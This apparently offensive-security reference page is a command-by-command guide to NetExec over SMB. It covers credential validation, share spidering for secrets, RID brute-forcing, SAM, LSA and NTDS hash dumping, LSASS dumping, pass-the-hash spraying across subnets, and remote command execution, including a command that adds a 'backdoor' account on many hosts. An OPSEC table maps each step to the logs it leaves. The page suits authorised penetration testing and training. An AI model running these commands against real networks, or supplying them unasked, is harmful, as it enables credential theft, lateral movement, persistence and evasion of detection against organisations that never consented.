SMB Operations with NetExec
#Overview
SMB (445/TCP) is NetExec's primary and most feature-rich protocol. It supports credential validation, share and user enumeration, hash dumping, pass-the-hash authentication, remote command execution, and a large library of modules. Most internal pentest workflows start with SMB operations.
#Prerequisites
- Network access to target SMB port (445/TCP)
- Valid domain or local credentials (unless testing null/guest sessions)
- NetExec installed (
pip install netexec)
#Credential Validation
The most basic operation — test whether a username/password combination is valid on a target:
# Single target, single credential
netexec smb 10.10.10.5 -u administrator -p 'Passw0rd!'
# [+] → valid credentials (Pwn3d! if local admin)
# [-] → invalid credentials
# Domain context
netexec smb 10.10.10.5 -u user -p pass -d domain.local
# Pass-the-hash (NTLM)
netexec smb 10.10.10.5 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99'
# -H -> LM:NT hash pair (LM can be all zeros)
# File-based credential lists
netexec smb 10.10.10.5 -u users.txt -p passwords.txt
netexec smb 10.10.10.5 -u users.txt -H hashes.txt
BASH
Interpreting output:
[+]green — valid credentials, non-admin[+]green +(Pwn3d!)— valid credentials with local admin rights[-]red — invalid credentials[*]yellow — informational
#Null and Guest Sessions
Test whether the target allows unauthenticated SMB access:
# Null session (empty credentials)
netexec smb 10.10.10.5 -u '' -p '' --shares
# If shares are listed → null session allowed
# Guest account
netexec smb 10.10.10.5 -u guest -p '' --shares
# If shares are listed → guest access enabled
# Check SMB signing (critical for relay attacks)
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy
# signing:False → target does NOT require SMB signing (relay-able)
# signing:True → target requires SMB signing (cannot relay to it)
BASH
#Share Enumeration
# List all shares
netexec smb 10.10.10.5 -u user -p pass --shares
# Shows: share name, permissions (READ/WRITE), description
# Recursive share spidering (find interesting files)
netexec smb 10.10.10.5 -u user -p pass -M spider_plus
# Output saved to: ~/.netexec/workspaces/<workspace>/spider_plus/
# Finds: .kdbx, .vmdk, .ova, backup files, configs, scripts, credentials
# Spider with custom pattern
netexec smb 10.10.10.5 -u user -p pass -M spider_plus -o PATTERN='*.xml,*.config,*.ini,*.bak,*.ps1,*.vbs,*.bat'
BASH
#User and Group Enumeration
# Enumerate domain users via SAMR (requires valid credentials)
netexec smb 10.10.10.5 -u user -p pass --users
# Lists: username, RID, full name
# RID brute-force (enumerate ALL users by cycling RIDs)
netexec smb 10.10.10.5 -u user -p pass --rid-brute
# RID 500 → Administrator (built-in)
# RID 501 → Guest
# RID 502 → krbtgt
# RID 1000+→ Domain users
# RID brute with range limit
netexec smb 10.10.10.5 -u user -p pass --rid-brute 5000
# Enumerates RIDs 500–5000
# Enumerate local groups
netexec smb 10.10.10.5 -u user -p pass --local-groups
# Shows: Administrators, Remote Desktop Users, etc. with members
# Enumerate domain groups (via SAMR)
netexec smb 10.10.10.5 -u user -p pass --groups
BASH
#Session and Logged-On User Enumeration
# Active SMB sessions (who's connected to this host)
netexec smb 10.10.10.5 -u user -p pass --sessions
# Shows: source IP, username, authentication method
# Currently logged-on users (interactive sessions)
netexec smb 10.10.10.5 -u user -p pass --loggedon-users
# Shows: username, session type (interactive/remote/network)
# Combine: find where Domain Admins are logged on
netexec smb 10.10.10.0/24 -u user -p pass --loggedon-users | grep -i "domain admin"
BASH
#Credential and Hash Dumping
# Dump local SAM database (local account hashes)
netexec smb 10.10.10.5 -u admin_user -p pass --sam
# Requires: local admin or SYSTEM equivalent
# Output: username : RID : LM_hash : NT_hash :::
# Dump LSA secrets (cached credentials, service account passwords)
netexec smb 10.10.10.5 -u admin_user -p pass --lsa
# Output: cached domain credentials, DPAPI keys, service account secrets
# Dump NTDS.dit (full Active Directory database)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
# Requires: Domain Admin or equivalent (Replicating Directory Changes)
# Output: every domain user hash, group membership, trust info
# Dump DPAPI master keys
netexec smb 10.10.10.5 -u admin_user -p pass --dpapi
# Used to decrypt: saved browser passwords, scheduled task credentials, etc.
# Remote LSASS dump via lsassy module (comsvcs.dll method)
netexec smb 10.10.10.5 -u admin_user -p pass -M lsassy
# Dumps LSASS process memory → extracts credentials offline
# Output saved to: ~/.netexec/workspaces/<workspace>/lsassy/
BASH
#Pass-the-Hash
Authenticate using NTLM hashes without knowing the plaintext password:
# Pass-the-hash with full LM:NT pair
netexec smb 10.10.10.5 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99'
# Pass-the-hash with NT hash only (LM set to blank)
netexec smb 10.10.10.5 -u administrator -H ':5f4dcc3b5aa765d61d8327deb882cf99'
# Spray a hash across a subnet
netexec smb 10.10.10.0/24 -u administrator -H ':NTHASH' --continue-on-success
# Pass-the-hash with local auth
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --local-auth
BASH
#Command Execution
# Execute a single command via SMB service manager
netexec smb 10.10.10.5 -u admin -p pass -x 'whoami'
# -x -> cmd.exe command (writes and executes a service binary)
# Execute PowerShell command
netexec smb 10.10.10.5 -u admin -p pass -X 'Get-Process | Select-Object Name,Id'
# Execute command on multiple targets
netexec smb targets.txt -u admin -p pass -x 'net user backdoor P@ssw0rd! /add'
# Execute with pass-the-hash
netexec smb 10.10.10.5 -u admin -H ':NTHASH' -x 'whoami /all'
BASH
#SMB Signing and Relay Attack Surface
# Check SMB signing status across a subnet
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy
# signing:False → relay target candidate
# signing:True → cannot relay SMB to this host
# Check WebClient (WebDAV) status — needed for coercion → relay
netexec smb 10.10.10.0/24 -u '' -p '' -M wcc
# WebClient:Running → can coerce WebDAV auth and relay to LDAP/SMB
# Combine: find relay-able hosts with WebClient
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy -M wcc
BASH
#Password Policy Enumeration
# Retrieve domain password policy
netexec smb 10.10.10.5 -u user -p pass --password-policy
# Shows: minimum length, lockout threshold, lockout duration, history, max age
# Critical for planning password spraying campaigns
BASH
#Disk and System Information
# List disk drives and free space
netexec smb 10.10.10.5 -u user -p pass --disks
# Check if target is a Domain Controller
netexec smb 10.10.10.5 -u user -p pass
# Output includes: "Domain Controller" indicator
BASH
#Common Pitfalls
- ⚠️ SMB signing blocks relay: If
signing:True, you cannot relay NTLM authentication to this host via SMB. Target LDAP or HTTP instead. - ⚠️ Local admin required for dumping: SAM/LSA/NTDS dumping requires administrative privileges. Validate with
(Pwn3d!)indicator first. - ⚠️ WinRM vs SMB execution:
-xon SMB uses service creation (requires admin). For non-admin command execution, use WinRM protocol instead. - ⚠️ RID brute lockouts: RID brute does NOT cause account lockouts (it queries SAMR, not authenticating each RID). Safe to run.
- ⚠️ Null session limitations: Modern Windows (Server 2016+) blocks null session SMB enumeration by default. You'll need at least a low-privileged domain credential.
#OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | Single failed login event (4625) per attempt |
| Share enumeration | Low | SMB tree connect logs |
| RID brute | Low | SAMR queries, no login events |
| spider_plus | Medium | High SMB file listing traffic |
| SAM/LSA dump | High | Service creation, file writes to disk |
| lsassy | High | LSASS process access, EDR trigger |
| Command execution (-x) | Medium | Service creation (7045), process creation (4688) |
| Password spraying | Medium | Multiple 4625 events across accounts |
#Post-Exploitation Value
- Valid credentials → lateral movement, further enumeration
- Share access → file exfiltration, configuration discovery
- User list → password spraying targets, Kerberoasting candidates
- SAM hashes → offline cracking, pass-the-hash
- LSA secrets → cached domain credentials, service account passwords
- NTDS dump → complete domain compromise evidence
- SMB signing:False → NTLM relay attack surface
#Cross-References
- LDAP Operations — Complementary domain enumeration
- Password Spraying — Spraying strategies using SMB
- Credential Dumping — Detailed dump workflows
- AD Attacks via NetExec — Full attack chains
- SMB Enumeration — Manual SMB enumeration techniques
- NTLM Theft & Relay — Relay attack details